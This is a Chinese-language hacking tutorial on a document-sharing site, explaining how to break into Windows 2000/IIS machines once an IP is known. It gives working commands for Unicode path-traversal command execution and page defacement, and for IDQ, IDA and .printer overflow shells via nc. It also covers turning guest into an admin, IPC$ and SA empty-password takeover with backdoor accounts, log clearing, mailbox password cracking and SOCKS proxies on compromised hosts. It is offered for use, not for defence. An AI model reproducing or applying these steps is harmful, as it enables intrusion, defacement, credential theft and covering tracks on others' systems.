首页 知道对方IP如何攻击入侵

知道对方IP如何攻击入侵

举报
开通vip

知道对方IP如何攻击入侵如何IP攻击(1)UNICODE漏洞入侵“Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。第一步,运行RANGSCAN扫描器,会出现扫描窗口,在最上面有两个from的横框,这是让你填一段IP范围的。在第一个框里填入启始域(打个比方,比如你要扫192.168.0.1至192.168.0.255)那么你在第一个框里就填入192.168.0.1,在to后面的框里填入192.168.0.255意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICOD...

知道对方IP如何攻击入侵
如何IP攻击(1)UNICODE漏洞入侵“Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。第一步,运行RANGSCAN扫描器,会出现扫描窗口,在最上面有两个from的横框,这是让你填一段IP范围的。在第一个框里填入启始域(打个比方,比如你要扫192.168.0.1至192.168.0.255)那么你在第一个框里就填入192.168.0.1,在to后面的框里填入192.168.0.255意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框,是要填入内容的如:/scripts/..%c0%af../winnt/system32/cmd.exe这句话的意思是扫描有%c0%af漏洞的机器,对象一般是英文的WIN2000机。我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。再按“扫描”。就看到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了,如果你选的IP范围好,呵,很快在扫描结果框里就会显示扫到的漏洞主机如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe意思是192.168.0.111主机有%c0%af漏洞,目标有了,我们马上打开浏览器。在网址栏里输入:100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\回车意思是查看机器里C盘的根目录。一般情况下,我们都可以在浏览器里看到类似如:Directoryofc:\2002-03-1303:47p289default.asp2002-02-1103:47p289default.htm2002-03-0904:35p<DIR>DocumentsandSettings2002-02-1103:47p289index.asp2002-02-1103:47p289index.htm2002-05-0805:19a<DIR>Inetpub2002-01-1910:37p<DIR>MSSQL72002-03-0904:22p<DIR>ProgramFiles2002-01-2306:21p<DIR>WINNT4File(s)1,156bytes5Dir(s)2,461,421,568bytesfree------------------------------的目录列表。也会碰到看不到文件的空目录。好,我们成功看到了机器里的C盘了。我们在浏览器里输入:192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set回车CGIErrorThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:ALLUSERSPROFILE=C:\DocumentsandSettings\AllUsersCommonProgramFiles=C:\ProgramFiles\CommonFilesCOMPUTERNAME=ONComSpec=C:\WINNT\system32\cmd.exeCONTENT_LENGTH=0GATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*HTTP_ACCEPT_LANGUAGE=zh-cnHTTP_CONNECTION=Keep-AliveHTTP_HOST=192.168.0.111HTTP_USER_AGENT=Mozilla/4.0(compatible;MSIE6.0b;Windows98;Win9x4.90)HTTP_ACCEPT_ENCODING=gzip,deflateHTTPS=offINSTANCE_ID=1LOCAL_ADDR=192.168.0.111NUMBER_OF_PROCESSORS=1Os2LibPath=C:\WINNT\system32\os2\dll;OS=Windows_NTPath=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINNPATH_TRANSLATED=c:\inetpub\wwwrootPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSHPROCESSOR_ARCHITECTURE=x86PROCESSOR_IDENTIFIER=x86Fa-----------------哈,我们看到了机器设置内容了,我们找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot意思是他的主页存放在c:\inetpub\wwwroot的目录里,知道就好办了。我们用命令:192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回车我们就可以看到c:\inetpub\wwwroot目录里的文件了,一般都有default.asp,default.htm,index.htm,index.asp,等等。我们以目录里有index.asp做例子。我们先要做的是把文件的只读属性解除掉,很多管理员都把文件设置只读。我们用命令:192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp回车当看到下面的英文CGIErrorThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:恭喜你,你可以改他的网页了。----------------------------------------但如果你看到下面的英文就不成功,只好换其他机器了。CGIErrorThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:Accessdenied-C:\inetpub\wwwroot\index.asp-----------------------------继续。现在用ECHO改网页的内容。100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+网站有漏洞+>c:\inetpub\wwwroot\index.asp回车当看到CGIErrorThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:的提示,你已经改了他的网页了,呵呵,你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。英文WIN2000/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\中文WIN2000/scripts/..%c0%2f../winnt/system32/cmd.exe/scripts/..%c1%1c../winnt/system32/cmd.exeWINNT4/scripts/..%c1%9c../winnt/system32/cmd.exe英文WIN2000/scripts/..%c0%af../winnt/system32/cmd.exe通用代码:/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\(2)Windows2000输入法漏洞先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。选择“帮助”——“输入法指南”——“选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。)按右键,选择“跳转到URL”,输入:c:\winnt\system32在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性”—“目标”—c:\winnt\system32\net.exe后面空一格,填入“userguest/active:yes”。点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。(此时你不会看到运行状态,但guest用户已被激活。)然后重复操作上面的,在“属性”——“目标”——c:\winnt\system32\net.exe后面空一格,填入localgroupadministratorsguest/add(这一步骤目的是,利用“net.exe”将guest变成系统管理员。)再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。现在,我们可以像操作本地主机一样,控制对方系统。(3)idq溢出漏洞要用到3个程序,一个SnakeIISIDQ溢出程序GUI版本,一个扫描器,还有NC。首先扫描一台有IDQ漏洞的机器,然后设置SnakeIISIDQ溢出程序,在被攻击IP地址后面写上对方的IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左面选择操作系统类型,随便选一个,我们选IIS5EnglishWin2kSp0吧,点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了,然后我们用NC来连接。进入MS-DOS。进入“nc”的目录。然后:nc--vIP813c:\>nc-vvIP813IP:inversehostlookupfailed:h_errno11004:NO_DATA(UNKNOWN)[IP]813(?):connectionrefusedsent0,rcvd0:NOTSOCKc:\>看来没成功.别灰心,在来一次,换用IIS5EnglishWin2kSp1试试。c:\>nc-vvIP813IP:inversehostlookupfailed:h_errno11004:NO_DATA(UNKNOWN)[IP]813(?)openMicrosoftWindows2000[Version5.00.2195](C)Copyright1985-2000MicrosoftCorp.C:\WINNT\system32>哈哈,终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。(4)IDA溢出漏洞所用程序:idahack进入MS-DOS方式(假设idq.exe在c:\下)c:\idahack.exe运行参数:c:\idahack<host><hostport><hosttype><shellport>chinesewin2k:1chinesewin2ksp1:2chinesewin2ksp2:3englishwin2k:4englishwin2ksp1:5englishwin2ksp2:6japanesewin2k:7japanesewin2ksp1:8japanesewin2ksp2:9koreawin2k:10koreawin2ksp1:11koreawin2ksp2:12chinesentsp5:13chinesentsp6:14c:\idahack127.0.0.180180connecting...sending...Nowyoucantelnetto80port好luck好,现在你可以telnet它的80端口了,我们用NC来连接。C:\nc127.0.0.180MicrosoftWindows2000[Version5.00.2195](C)版权所有1985-1998MicrosoftCorpC:\WINNT\system32>OK,现在我们现在上来了,也可IDQ一样是SYSTEN权限,尽情的玩吧。(5).printer漏洞这个漏洞,我们用两个程序来入侵。iis5hack和nc。C:\>iis5hackiis5remote.printeroverflow.writenbysunxhttp://www.sunx.orgfortestonly,dontusedtohack,:pusage:D:\IIS5HACK.EXE<Host><HostPort><HostType><ShellPort>用法:D:\IIS5HACK<溢出的主机><主机的端口><主机的类型><溢出的端口>chineseedition:0chineseedition,sp1:1englishedition:2englishedition,sp1:3japaneseedition:4japaneseedition,sp1:5koreaedition:6koreaedition,sp1:7mexicoedition:8mexicoedition,sp1:9c:\>iis5hack127.0.0.19801119iis5remote.printeroverflow.writenbysunxhttp://www.sunx.orgfortestonly,dontusedtohack,:pListn:80connecting...sending...Nowyoucantelnetto3739port好luck溢出成功!c:\>nc127.0.0.19119http://www.sunx.orgMicrosoftWindows2000[Version5.00.2195](C)版权所有1985-2000MicrosoftCorp.C:\WINNT\system32>OK,我们又成功取得system权限!玩吧。(6)139端口入侵我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat-aIP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。用到两个NET命令,下面就是这两个命令的使用方法NETVIEW?作用:显示域列表、计算机列表或指定计算机的共享资源列表。?命令格式:netview[\\computername|/domain[:domainname]]?参数介绍:?<1>键入不带参数的netview显示当前域的计算机列表。?<2>\\computername指定要查看其共享资源的计算机。?<3>/domain[:domainname]指定要查看其可用计算机的域?NETUSE?作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。?命令格式:netuse[devicename|*][\\computername\sharename[\volume]]?[password|*]][/user:[domainname\]username][[/delete]|?[/persistent:{yes|no}]]?参数介绍:?键入不带参数的netuse列出网络连接。?devicename指定要连接到的资源名称或要断开的设备名称。?\\computername\sharename服务器及共享资源的名称。?password访问共享资源的密码。?*提示键入密码。/user指定进行连接的另外一个用户。?domainname指定另一个域。?username指定登录的用户名。?/home将用户连接到其宿主目录?/delete取消指定网络连接。?/persistent控制永久网络连接的使用。?C:\netuse\\IPC:\netview\\IP我们已经看到对方共享了他的C,D,E三个盘我们要做的是使用NBTSTAT命令载入NBT快取.c:\>nbtstat–R载入NBT快取c:\>nbtstat–c看有无载入NBT快取现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上领居的一样。(7)IPC入侵所有程序:流光开始:在主界面选择探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。输入我们要破解的IP段,我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度:)填入IP,选择扫描NT/98主机。在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”,,扫描出结果以后,“IPC$主机”,选中后按“CTRL+F9”就开始探测IPC用户列表。会出现“IPC自动探测”的窗体,把那两个选项都选了,然后点“选项”为了加快弱口令扫描速度,这里的两个选项我们可以全部取消记住。然后点“确定”出来后点“是”就开始探测了。一会儿,结果出来了。比如我们探测出了用户名为“admin”的管理员,密码为“admin”,现在我们用命令提示符,熟悉下命令吧,输入:netusefile://对方ip/ipc$"密码"/user:"用户名"||建立远程连接copyicmd.exefile://对方ip/admin$||admin$是对方的winnt目录nettimefile://对方IP/||看看对方的本地时间atfile://对方ip/启动程序的时间启动程序名启动程序的参数||用at命令来定时启动程序telnet对方ip端口我们也可以改网页:netuse\\ip\ipc$"admin"/uesr:"admin"回车。出现“命令成功完成”。然后输入“dir\\ip\c$\*.*”看到C:下所有内容。现在我们来改主页。一般主页放在c:\inetpub\wwwroot里面输入“dir\\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或default.asp.这些就是主页了,假如你黑页在C:下,就输入"copy主页文件\\ip\c$\inetpub\wwwroot"覆盖原文件这样就行了,简单吧?日志清除,断开连接:我们copycl.exe,clear.exe上去,再执行,就可以清除日志,比如clearall:清除所有的日志。然后在断开连接:netusefile://ip/ipc$/delete(8)超管SA空密码漏洞使用的工具:流光IV启动流光,按Ctrl+R。出现扫描设置对话框,设置扫描IP段,并且选择扫描的类型为SQL。点击“确定”,进行扫描,假设我们取得主机:127.0.0.1,然后点击“工具”——SQL远程命令(或者Ctrl+Q),填入主机IP(127.0.0.1)、用户(sa)、密码(空)点击“连接”,出现远程命令行的界面。netuserheiyingheiying1/add填加一个heiying的帐号和密码heiying1netlocalgroupadministratorsheiying/add将我们创建的heiying帐号填加到管理组。下面我们来做跳板:打开cmd.exe,输入netuse\\127.0.0.1\ipc$"heiying1"/user:"heiying"命令显示命令成功完成。上传srv.exe:copysrv.exe\\127.0.0.1\admin$\system32上传ntlm.exe:copyntlm.exe\\127.0.0.1\admin$\system32启动服务:首先用nettime\\127.0.0.1看看对方主机的时间,(假如回显\\127.0.0.1的本地时间是上午12.00),然后我们用at\\2127.0.0.112.01srv.exe命令来启动srv.exe。等一分钟后就可以telnet了。一分钟后在本机命令提示符中输入:telnetX.X.X.X99然后我们要启动NTLM.exe:在telnet状态下直接输入ntlm回车。显示:windows2000telnetdump,byassassin,allrightsreserved.done!然后从新启动对方主机的telnet服务:netstoptelnet(先关闭telnet服务)再输入netstarttelnet(启动telnet服务)然后我们退出telnet,然后在命令行下输入telnet127.0.0.1,依照提示,接着输入用户名:heiying,密码:heiying1,回车。这样,我们的跳板就做好了,简单吧?(上面上传的srv和ntlm等东东还有一个简便方法,全都可以直接用流光工具菜单里的种植者上传,60秒后自动运行,不用敲命令!呵呵~~~~方便吧!)(9)如何用流光破解信箱密码这次的目标是21CN,运行流光IV,选择POP3主机----右键----编辑----添加,填上:pop.21cn.com,其他的就用默认吧!不用更改,确定就行了。到下一步,还是右键-----从列表中添加------选择一个字典,没有的到网上下载一个字典,或者到黑白网络去下载,我们用简单模式探测!这样速度比较快,然后就等着成果吧,上次我以下就破了5个邮箱出来。(10)frontpage进行攻击打开您自己的Frontpage,文件菜单下选择“打开站点”,然后在文件夹框里写入http://127.0.0.1(http://不要漏掉)。按下“打开”按钮,一会后,出现了文件夹,成功了,现在就可以操作网页文件了。如果跳出错误信息,表示有密码,我们用以下http://127.0.0.1/_vti_pvt/service.pwd,这是默认的密码文件,下载下来,找个解密器破密码吧!破出来后就还可以改网页。这个只能改该网页,没什么玩的。(11)用肉鸡做SOCK5代理跳板需要软件:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。首先我们在命令提示符下建立IPC$管道:netuse\\127.0.0.1\ipc$"密码"/user:帐号通道建立好后,我们把srv.exesss.exentlm.exe全部上传。c:\copysrv.exe\\10.10.10.10\admin$1filescopied!c:\copyntlm.exe\\10.10.10.10\admin$1filescopied!c:\copysss.exe\\10.10.10.10\admin$1filescopied!复制完毕后,看肉鸡上现在的时间:c:\nettime\\127.0.0.1显示当前时间是2002/4/13晚上09:00我们来启动srv.exec:\at\\127.0.0.109:01srv.exe等到09:01后。我们来连接肉鸡:c:\telnet127.0.0.199连上后显示:c:\winnt\system32>接着我们启动NTLM.exec:\winnt\system32>ntlm显示:Windows2000TelnetDump,byAssassin,AllRightsReserved.Done!C:\WINNT\system32>首先我们终止srv.exe的telnet服务:C:\WINNT\system32>netstoptelnet继续:C:\WINNT\system32>netstarttelnet再启动TELNET。OK,我们来登陆c:>telnet127.0.0.1*==========================================================MicrosoftTelnet*==========================================================c:>好了,一切顺利,我们现在正式开始做代理:c:>sss.exe-install<---------开始安装显示:c:>sksockserverinstalled!来看看配置:c:>sss-configshow显示:SkServerPort=1813<----开放服务的端口,我们记着这个1813端口哦SkServerStartType:3-Manual<---服务启动方式SkServerEnableClientSetNum:0<---客户端的项目个数SkServerPassSkServerNumber:0<---经过SkServer的项目个数来启动服务:c:>netstartskserver提示你正在启动,并且完成。来检查一下是不是启动了:c:>netstart<-----------看看启动的服务列表TheseWindows2000servicesarestarted:PrintSpoolerServerSnakeSockProxyService<---------------就是它,呵呵!SystemEventNotificationTCP/IPNetBIOSHelperServiceTelephonyTelnetThecommandcompletedsuccessfully.c:>_好了,到这里我们已经做好了一个socks5代理了,我们自己的哦.OK,下面我们用sockscap来使用我们做代理。安装好SocksCap后,我们在桌面上打开SocksCapV2,点开File选项选Settings...弹出卡片,在SOCKSServer里面我们填肉鸡的IP:127.0.0.1,PortT填默认的1813端口,下面的我们选socksversion5,呵呵,和Attemptlocalthenremot,这是域名解析的顺序,先本地,然后才远程。设置完了点“确定”我们就可以使用了,添加应用程序到sockscap里面,点开那个"new"按钮,会弹出一个卡片,Profilename:程序名,随便写。CommandLine:命令行,点后面的Browse...找到你的程序路径Working:填好上面那个,这个就自动加上.这样我们就把程序加到SocksCap里面了。现在们可以双击里面的程序来使用,也可以选住程序在点"Run"来运行。
本文档为【知道对方IP如何攻击入侵】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑, 图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
该文档来自用户分享,如有侵权行为请发邮件ishare@vip.sina.com联系网站客服,我们会及时删除。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。
本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。
网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。
下载需要: 免费 已有0 人下载
最新资料
资料动态
专题动态
个人认证用户
真诚文档交流
本人从事临床麻醉五年有余,工作兢兢业业,拥有丰富的临床麻醉经验及临床医学资料,并取得了助理医师资格。
格式:doc
大小:66KB
软件:Word
页数:0
分类:初中语文
上传时间:2020-02-16
浏览量:3